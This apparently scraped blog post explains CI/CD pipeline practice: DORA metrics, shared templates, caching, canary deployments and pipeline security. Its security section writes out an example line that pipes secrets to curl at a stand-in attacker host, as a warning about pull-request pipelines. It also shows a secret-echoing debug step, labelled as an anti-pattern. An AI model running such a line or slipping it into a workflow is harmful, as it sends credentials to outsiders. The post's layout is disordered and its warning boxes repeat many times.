Tools: Your CI/CD Pipeline is a Dumpster Fire - Here's the Extinguisher 🧯

🎬 Welcome to Pipeline Therapy

📊 DORA Metrics: How to Know If You're Actually Good

Here's the Uncomfortable Truth

How to Track DORA Now

🏗️ Pipeline Architecture: The Template Library Pattern

The Anti-Pattern: Every Team Reinvents the Wheel

The Solution: Shared Template Library

Azure DevOps: Template Library in Action

GitHub Actions: Reusable Workflows

⚡ Pipeline Performance: From 45 Minutes to 5

Where's the Time Going?

The Optimization Playbook

🚨 Real-World Disaster #1: The Self-Hosted Runner That Poisoned Everything

🚒 Deployment Strategies: How to Ship Without Sinking

The Deployment Strategy Menu

Canary Deployment: The Smart Way to Ship

🚨 Real-World Disaster #2: The Friday 5 PM Deployment

🔐 Pipeline Security: Your Pipeline is an Attack Vector

Things That Should Scare You

Pipeline Security Checklist

🚨 Real-World Disaster #3: The Secret That Wasn't Secret

Multi-Team Governance: Herding Cats With Guardrails

🎯 Key Takeaways

🔥 Homework

🎬 Welcome to Pipeline Therapy

Let me describe your CI/CD pipeline. Stop me when I'm wrong:

Let's fix all of this.

📊 DORA Metrics: How to Know If You're Actually Good

Before fixing anything, you need to measure where you stand. Google's DORA research (14,000+ teams studied) identified 4 key metrics that predict software delivery performance:

Here's the Uncomfortable Truth

If your team deploys once a week, your lead time is 3 days, and your change failure rate is 30%, you are statistically average. Not bad, but not good either. Elite teams deploy multiple times per day with a change failure rate of 15% or less. They're not smarter; they have better pipelines, smaller changes, and more automation.

How to Track DORA Now

Record every production deployment from the pipeline itself. Or use tools like Sleuth or LinearB, or the DORA dashboards your Git hosting platform provides, if your plan includes them.

Where's the Time Going?

In my experience auditing pipelines, here's where time hides:

The Optimization Playbook

1. Cache Dependencies
2. Docker Layer Caching
3. Run Tests in Parallel
4. Only Test What Changed

🚨 Real-World Disaster #1: The Self-Hosted Runner That Poisoned Everything

What Happened: Self-hosted build agents accumulated Docker images, node_modules caches, and build artifacts over months. The disk filled up. Builds started failing randomly across all teams.

Worse: One build left behind a corrupted node_modules folder. The next build on the same agent used the cached corruption and deployed a broken application.

🚨 Real-World Disaster #2: The Friday 5 PM Deployment

What Happened: The team deploys at 5:07 PM on Friday (bad idea, but deadlines). A rolling update replaces all 3 pods. The new version has a memory leak that manifests after 4 hours. At 9 PM, pods start getting OOMKilled. Nobody's monitoring. By Saturday morning, the payment service has been down for 12 hours.

If they had used canary: The 5% canary pod would have shown increasing memory usage within 2 hours. Automated rollback triggers at 7 PM. 95% of users never notice. The team enjoys their weekend.

🔐 Pipeline Security: Your Pipeline is an Attack Vector

Your CI/CD pipeline has more access than most developers:

🚨 Real-World Disaster #3: The Secret That Wasn't Secret

What Happened: A developer added a debug step to a pipeline:

GitHub/Azure DevOps masks secrets in logs... usually. But this string was only partially masked because it contained special characters that broke the masking regex. The full production database password appeared in the build log. The build log was accessible to 200 developers.

Multi-Team Governance: Herding Cats With Guardrails

At the Principal level, you're not just building pipelines; you're building the pipeline platform that 10+ teams use. Here's how to standardize without becoming a bottleneck:

Next up in the series: Your App is on Fire and You Don't Even Know: Observability for Humans, where we decode metrics, logs, traces, and why alert fatigue is slowly killing your team.

💬 What's the longest CI/CD pipeline you've ever suffered through? I once saw a 3-hour Java build. Yes, three hours. Share your pain below.

    Metric                   │ Elite          │ "We Need Help"
    ─────────────────────────┼────────────────┼──────────────────
    Deployment Frequency     │ Multiple/day   │ Monthly or less
    Lead Time for Changes    │ < 1 hour       │ > 1 month
    Change Failure Rate      │ 0-15%          │ > 45%
    Mean Time to Recovery    │ < 1 hour       │ > 6 months

    # GitHub Actions: Track deployment frequency
    - name: Record deployment
      run: |
        curl -X POST "${{ secrets.METRICS_ENDPOINT }}" \
          -H "Content-Type: application/json" \
          -d '{
            "event": "deployment",
            "service": "${{ github.repository }}",
            "environment": "production",
            "sha": "${{ github.sha }}",
            "timestamp": "'$(date -u +%Y-%m-%dT%H:%M:%SZ)'"
          }'
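Once deployment events like the one recorded above are being collected, the metrics themselves are a few lines of arithmetic. The sketch below is a minimal illustration in Python, not part of any DORA tooling: the `Deployment` record, its field names, and `dora_summary` are hypothetical, and it assumes each recorded deployment can be joined with a commit timestamp and a failed flag. Mean time to recovery is left out because it needs incident data that a deploy event alone does not carry.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta
from statistics import median


@dataclass
class Deployment:
    """One recorded production deployment (hypothetical schema)."""
    deployed_at: datetime    # when the deploy finished
    committed_at: datetime   # when the deployed commit was created
    failed: bool = False     # True if it caused an incident or a rollback


def dora_summary(deployments: list[Deployment], window_days: int) -> dict:
    """Summarize three of the four DORA metrics over a reporting window."""
    if not deployments:
        return {
            "deploys_per_day": 0.0,
            "median_lead_time_hours": None,
            "change_failure_rate": None,
        }
    # Lead time for changes: commit to production, in hours.
    lead_times = [
        (d.deployed_at - d.committed_at).total_seconds() / 3600
        for d in deployments
    ]
    failures = sum(1 for d in deployments if d.failed)
    return {
        "deploys_per_day": len(deployments) / window_days,
        "median_lead_time_hours": median(lead_times),
        "change_failure_rate": failures / len(deployments),
    }


if __name__ == "__main__":
    start = datetime(2024, 1, 1, 9, 0)
    # Four weekly-ish deploys, each shipped six hours after its commit.
    sample = [
        Deployment(
            deployed_at=start + timedelta(days=i),
            committed_at=start + timedelta(days=i) - timedelta(hours=6),
            failed=(i == 3),
        )
        for i in range(4)
    ]
    print(dora_summary(sample, window_days=28))
```

The median is used for lead time rather than the mean so that one stuck change does not hide an otherwise fast pipeline; that is a design choice of this sketch, not something the source prescribes.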
    Team Alpha:   800-line custom YAML → Azure DevOps
    Team Bravo:   600-line custom YAML → Azure DevOps (different structure)
    Team Charlie: "We just deploy from our laptops" → 😱

    Result:
    • 3 different security scanning approaches
    • 2 teams forgot to add container image scanning
    • 1 team has no tests in their pipeline
    • Nobody can help debug another team's pipeline

    ┌──────────────────────────────────────────────────┐
    │         Shared Template Library (v2.5.0)         │
    │                                                  │
    │  ┌───────────┐  ┌───────────┐  ┌───────────────┐ │
    │  │ Build     │  │ Test      │  │ Security      │ │
    │  │ Template  │  │ Template  │  │ Scan          │ │
    │  │ (.NET,    │  │ (unit,    │  │ Template      │ │
    │  │ Node,     │  │ integ,    │  │ (Trivy,       │ │
    │  │ Python)   │  │ e2e)      │  │ Checkov)      │ │
    │  └───────────┘  └───────────┘  └───────────────┘ │
    │  ┌───────────┐  ┌───────────┐  ┌───────────────┐ │
    │  │ Deploy    │  │ Notify    │  │ Rollback      │ │
    │  │ Template  │  │ Template  │  │ Template      │ │
    │  │ (K8s,     │  │ (Slack,   │  │ (auto/        │ │
    │  │ AppSvc)   │  │ Teams)    │  │ manual)       │ │
    │  └───────────┘  └───────────┘  └───────────────┘ │
    └──────────────────────────────────────────────────┘
                         │ consumed by
                         ▼
    ┌──────────────────────────────────────────────────┐
    │ Team pipelines (10-20 lines each!)               │
    │ "Use build template, test template, deploy       │
    │  template, just tell it your service name"       │
    └──────────────────────────────────────────────────┘

    # Team's pipeline: SHORT and STANDARD
    trigger:
      branches:
        include: [main]

    resources:
      repositories:
        - repository: templates
          type: git
          name: platform/pipeline-templates
          ref: refs/tags/v2.5.0  # 🔑 Always pin the version!

    stages:
      - template: stages/ci.yml@templates
        parameters:
          language: dotnet
          dotnetVersion: '8.0'
          testProjects: '**/*Tests.csproj'

      - template: stages/security-scan.yml@templates
        parameters:
          trivySeverity: 'CRITICAL,HIGH'

      - template: stages/deploy-k8s.yml@templates
        parameters:
          environment: staging
          aksCluster: aks-staging-eastus
          namespace: payments

      - template: stages/deploy-k8s.yml@templates
        parameters:
          environment: production
          aksCluster: aks-prod-eastus
          namespace: payments
          requireApproval: true
    # .github/workflows/deploy.yml (team's workflow)
    name: Deploy
    on:
      push:
        branches: [main]

    jobs:
      build-and-test:
        uses: myorg/shared-workflows/.github/workflows/build-dotnet[email protected]
        with:
          dotnet-version: '8.0'
          project-path: 'src/PaymentService'

      security-scan:
        needs: build-and-test
        uses: myorg/shared-workflows/.github/workflows/security-scan[email protected]
        with:
          image: ${{ needs.build-and-test.outputs.image }}

      deploy:
        needs: [build-and-test, security-scan]
        uses: myorg/shared-workflows/.github/workflows/deploy-k8s[email protected]
        with:
          environment: production
          image: ${{ needs.build-and-test.outputs.image }}
        secrets: inherit
    Typical 45-minute pipeline breakdown:
    ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
     7 min │███████│ Agent startup + checkout
    12 min │████████████│ Dependency install (npm/nuget)
     5 min │█████│ Build
     8 min │████████│ Tests (running ALL tests sequentially)
     3 min │███│ Docker build (no layer caching)
     5 min │█████│ Security scanning
     5 min │█████│ Deploy + smoke tests
    ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
    45 min total 💀

    Optimized 5-minute pipeline:
    ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
    0.5 min │█│ Cached checkout
    0.5 min │█│ Cached dependencies
      1 min │██│ Incremental build
      1 min │██│ Parallel tests (affected only)
    0.5 min │█│ Docker build (cached layers)
      1 min │██│ Parallel: scan + deploy
    0.5 min │█│ Smoke test
    ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
    5 min total 🚀

    # GitHub Actions: cache npm's download cache (~/.npm, not node_modules)
    - uses: actions/cache@v4
      with:
        path: ~/.npm
        key: npm-${{ hashFiles('**/package-lock.json') }}
        restore-keys: npm-

    # Azure DevOps: Cache NuGet packages
    - task: Cache@2
      inputs:
        key: 'nuget | "$(Agent.OS)" | **/packages.lock.json'
        restoreKeys: 'nuget | "$(Agent.OS)"'
        path: $(NUGET_PACKAGES)

    # BAD: Copying everything first invalidates the cache on every code change
    COPY . .
    RUN npm install

    # GOOD: Copy package files first, install, THEN copy code
    COPY package.json package-lock.json ./
    # --omit=dev is the current spelling of the deprecated --production flag
    RUN npm ci --omit=dev
    COPY . .
    # Now code changes don't re-trigger npm install
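The dependency caches and Docker's layer cache rest on the same idea: a cached result is reused only while a hash of its inputs is unchanged. The following Python sketch illustrates that idea under simplifying assumptions. `cache_key` and `lookup` are hypothetical helpers, not the implementation behind `actions/cache`, `Cache@2`, or Docker, and the prefix fallback here returns the first matching entry rather than the most recent one.

```python
import hashlib
from typing import Optional


def cache_key(prefix: str, lockfile_bytes: bytes) -> str:
    """Build a key that changes only when the lockfile content changes."""
    digest = hashlib.sha256(lockfile_bytes).hexdigest()
    return f"{prefix}-{digest[:16]}"


def lookup(cache: dict[str, str], key: str, restore_prefix: str) -> Optional[str]:
    """Try an exact hit first, then fall back to any key sharing the prefix."""
    if key in cache:
        return cache[key]
    for existing_key, value in cache.items():
        if existing_key.startswith(restore_prefix):
            return value  # stale, but a usable starting point for the install
    return None


if __name__ == "__main__":
    old_key = cache_key("npm", b'{"lodash": "4.17.20"}')
    new_key = cache_key("npm", b'{"lodash": "4.17.21"}')
    cache = {old_key: "packages for lodash 4.17.20"}

    print(lookup(cache, old_key, "npm-"))  # exact hit: lockfile unchanged
    print(lookup(cache, new_key, "npm-"))  # prefix fallback: lockfile changed
    print(lookup({}, new_key, "npm-"))     # cold cache: nothing to restore
```

This is also why the Dockerfile ordering matters: copying only the package files before the install step keeps the hashed inputs of that layer stable when application code changes.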
    # GitHub Actions: Matrix strategy
    jobs:
      test:
        runs-on: ubuntu-latest
        strategy:
          matrix:
            shard: [1, 2, 3, 4]
        steps:
          - uses: actions/checkout@v4
          # --shard needs a test runner that supports it (for example Jest 28+)
          - run: npm test -- --shard=${{ matrix.shard }}/4

    # For monorepos: detect which service changed
    - uses: dorny/paths-filter@v3
      id: changes
      with:
        filters: |
          payments:
            - 'services/payments/**'
          users:
            - 'services/users/**'

    - name: Test payments
      if: steps.changes.outputs.payments == 'true'
      run: cd services/payments && npm test

    ERROR: npm ERR! ENOSPC: no space left on device

    # Runs even when earlier steps fail (GitHub Actions uses `if`, not `condition`)
    - name: Agent cleanup
      if: always()
      run: |
        docker system prune -af --volumes
        rm -rf /tmp/build-*

    Strategy           │ Risk   │ Speed │ Rollback │ Best For
    ───────────────────┼────────┼───────┼──────────┼────────────────────────
    Rolling Update     │ Med    │ Fast  │ Slow     │ Default K8s strategy
    Blue-Green         │ Low    │ Fast  │ Instant  │ Stateless services
    Canary             │ Low    │ Slow  │ Fast     │ High-risk changes
    Feature Flags      │ Lowest │ Inst. │ Instant  │ Business logic changes
    Step 1: Deploy new version to 5% of traffic
    ┌─────────────────────────────────┐
    │  95% traffic → v1.0 (3 pods)    │
    │   5% traffic → v2.0 (1 pod)     │ ← Watch error rates, latency
    └─────────────────────────────────┘

    Step 2: If metrics look good, increase to 25%
    ┌─────────────────────────────────┐
    │  75% traffic → v1.0 (3 pods)    │
    │  25% traffic → v2.0 (1 pod)     │ ← Still watching...
    └─────────────────────────────────┘

    Step 3: If still good, go to 100%
    ┌─────────────────────────────────┐
    │ 100% traffic → v2.0 (3 pods)    │ ← 🎉 Full rollout
    └─────────────────────────────────┘

    Step ABORT: If any stage looks bad
    ┌─────────────────────────────────┐
    │ 100% traffic → v1.0 (3 pods)    │ ← 😌 Safely rolled back
    │   0% traffic → v2.0 (removed)   │
    └─────────────────────────────────┘
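The "watch, then promote or abort" decision at each canary step can be automated. The sketch below is one minimal way to express it in Python, assuming you can sample an error rate and memory usage for the canary and the stable version. The `Snapshot` fields, the `canary_verdict` function, and both thresholds are hypothetical values chosen for illustration, not settings from any particular rollout tool.

```python
from dataclasses import dataclass


@dataclass
class Snapshot:
    """Metrics for one version at one point in time (hypothetical fields)."""
    error_rate: float  # fraction of failed requests, 0.0 to 1.0
    memory_mb: float   # memory in use by the pod


def canary_verdict(
    baseline: Snapshot,
    canary_history: list[Snapshot],
    max_error_delta: float = 0.01,
    max_memory_growth: float = 1.5,
) -> str:
    """Return "wait", "promote", or "rollback" for the current canary step."""
    if len(canary_history) < 2:
        return "wait"  # one sample cannot show a trend

    first, latest = canary_history[0], canary_history[-1]

    # Abort if the canary fails noticeably more often than the stable version.
    if latest.error_rate - baseline.error_rate > max_error_delta:
        return "rollback"

    # Abort if memory keeps climbing: the signature of a slow leak.
    if first.memory_mb > 0 and latest.memory_mb / first.memory_mb > max_memory_growth:
        return "rollback"

    return "promote"


if __name__ == "__main__":
    stable = Snapshot(error_rate=0.002, memory_mb=300)

    healthy = [Snapshot(0.003, 300), Snapshot(0.002, 310)]
    leaking = [Snapshot(0.002, 300), Snapshot(0.002, 400), Snapshot(0.002, 520)]

    print(canary_verdict(stable, healthy))
    print(canary_verdict(stable, leaking))
```

Comparing memory against the canary's own first sample, rather than against the stable pods, is what lets a check like this catch a leak that only shows up hours after the deploy.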
β”‚ ← 😱 β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ Scary Thing #3: Dependency confusion attacks β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚ Internal package: @mycompany/utils β”‚ β”‚ Attacker publishes: @mycompany/utils on -weight: 500;">npm β”‚ β”‚ Pipeline installs public one first... β”‚ ← 🦠 β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ Scary Thing #1: Secrets in pipeline logs β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚ Step: Deploy β”‚ β”‚ $ echo $DATABASE_CONNECTION_STRING β”‚ β”‚ Server=prod.db.windows.net;Password=Pa$$w0rdβ”‚ ← 🫠 β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ Scary Thing #2: Pull request pipelines run arbitrary code β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚ External contributor opens PR β”‚ β”‚ PR changes build script to: β”‚ β”‚ echo $SECRETS | -weight: 500;">curl attacker.com β”‚ β”‚ Pipeline runs automatically... β”‚ ← 😱 β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ Scary Thing #3: Dependency confusion attacks β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚ Internal package: @mycompany/utils β”‚ β”‚ Attacker publishes: @mycompany/utils on -weight: 500;">npm β”‚ β”‚ Pipeline installs public one first... 
β”‚ ← 🦠 β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ Scary Thing #1: Secrets in pipeline logs β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚ Step: Deploy β”‚ β”‚ $ echo $DATABASE_CONNECTION_STRING β”‚ β”‚ Server=prod.db.windows.net;Password=Pa$$w0rdβ”‚ ← 🫠 β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ Scary Thing #2: Pull request pipelines run arbitrary code β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚ External contributor opens PR β”‚ β”‚ PR changes build script to: β”‚ β”‚ echo $SECRETS | -weight: 500;">curl attacker.com β”‚ β”‚ Pipeline runs automatically... β”‚ ← 😱 β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ Scary Thing #3: Dependency confusion attacks β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚ Internal package: @mycompany/utils β”‚ β”‚ Attacker publishes: @mycompany/utils on -weight: 500;">npm β”‚ β”‚ Pipeline installs public one first... 
└─────────────────────────────────────────────┘

Authentication:
  ✅ OIDC federation (no long-lived secrets in pipelines)
  ✅ Managed Identity for Azure resources
  ✅ Short-lived tokens (expire in minutes, not months)

Authorization:
  ✅ Pipeline can only deploy to its own service
  ✅ Production deploys require approved PR + passing checks
  ✅ Environment protection rules with required reviewers

Dependencies:
  ✅ Lock files committed (package-lock.json, go.sum)
  ✅ Dependency scanning (Dependabot, Snyk)
  ✅ Private package registry for internal packages

Secrets:
  ✅ Never echo/print secrets in logs
  ✅ Use secret masking in pipeline variables
  ✅ Rotate secrets automatically
  ✅ Audit who accesses what secret

# Anti-pattern: this debug step writes the connection string to the build log
- name: Debug connection
  run: |
    echo "Connecting to: ${{ secrets.DB_CONNECTION_STRING }}"

# GitHub Actions: OIDC to Azure (no secrets!)
permissions:
  id-token: write
  contents: read
steps:
  - uses: azure/login@v2
    with:
      client-id: ${{ vars.AZURE_CLIENT_ID }}  # Not a secret!
      tenant-id: ${{ vars.AZURE_TENANT_ID }}
      subscription-id: ${{ vars.AZURE_SUBSCRIPTION_ID }}

Platform Team Provides:          App Teams Customize:
════════════════════════         ════════════════════
✅ Template library              ✅ Service name & config
✅ Security scanning             ✅ Test commands
✅ Deployment strategies         ✅ Environment-specific vars
✅ Secret management pattern     ✅ Notification channels
✅ DORA metrics collection       ✅ Deployment schedule
✅ Compliance guardrails         ✅ Custom test stages

Template repo:
platform/pipeline-templates
├── Maintained by platform team
├── Versioned with semantic versioning (v2.5.0)
├── Teams consume via git tags (immutable reference)
├── Breaking changes = major version bump
├── Teams can contribute improvements via PR
└── Monthly "template office hours" for questions

- It takes 42 minutes to build and deploy
- Nobody knows exactly what it does (the YAML is 800 lines)
- Each team has their own custom pipeline because "our needs are different"
- Flaky tests fail 20% of the time, and everyone just re-runs the pipeline
- There's a manual approval step where someone clicks "Approve" without looking
- Someone set it up 3 years ago and that person doesn't work here anymore

- Use ephemeral agents (fresh VM/container per build): Azure DevOps Scale Set agents or GitHub Actions hosted runners
- If self-hosted, add a cleanup job:

- Never deploy on Friday (unless you have canary + automated rollback)
- Never deploy during peak hours (find your low-traffic window)
- Always have automated rollback based on error rates and latency
- Small changes, frequent deploys > big changes, occasional deploys

- It can push code to production
- It has access to secrets and credentials
- It can modify infrastructure
- It downloads code from the internet (dependencies)

- Remove all echo/print statements that reference secrets
- Use OIDC federation so there are no secrets to leak:

- Measure DORA metrics: you can't improve what you don't measure
- Template libraries standardize quality without removing team autonomy
- Cache everything to cut build times by 80%+
- Canary deployments are the safest way to ship to production
- OIDC federation eliminates the #1 pipeline security risk (leaked secrets)
- Never deploy on Friday. Just don't. 🙅

- Time your pipeline end-to-end. Write down the duration of each step. Find the biggest bottleneck.
- Check if your pipeline uses long-lived secrets.
  Replace one with OIDC federation.
- Add caching for dependencies if you haven't already, then measure the before/after build time.
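
For the first homework item (time each step, then find the biggest bottleneck), here is a minimal sketch of how you might rank the numbers once you've written them down. The `rank_steps` function name, the tab-separated input format, and the step timings are all assumptions made up for illustration. They are not output from any real pipeline or CI tool.

```shell
#!/usr/bin/env bash
# Rank pipeline steps by duration to find the biggest bottleneck.
# Input:  one line per step, "<seconds><TAB><step name>".
# Output: slowest first, "<seconds><TAB><share of total><TAB><step name>".
rank_steps() {
  awk -F'\t' '
    { secs[NR] = $1; name[NR] = $2; total += $1 }
    END {
      for (i = 1; i <= NR; i++) {
        share = (total > 0) ? 100 * secs[i] / total : 0
        printf "%d\t%.0f%%\t%s\n", secs[i], share, name[i]
      }
    }
  ' | sort -t "$(printf '\t')" -k1,1nr
}

# Hypothetical timings, copied by hand from one pipeline run.
printf '%s\t%s\n' \
  90  "install dependencies" \
  600 "unit tests" \
  250 "docker build" \
  60  "deploy" \
  | rank_steps
```

With these made-up numbers, "unit tests" lands at the top with 60% of the total, so that is the step to attack first (parallelize it, or only test what changed). Re-run the same ranking after each optimization to get the before/after comparison.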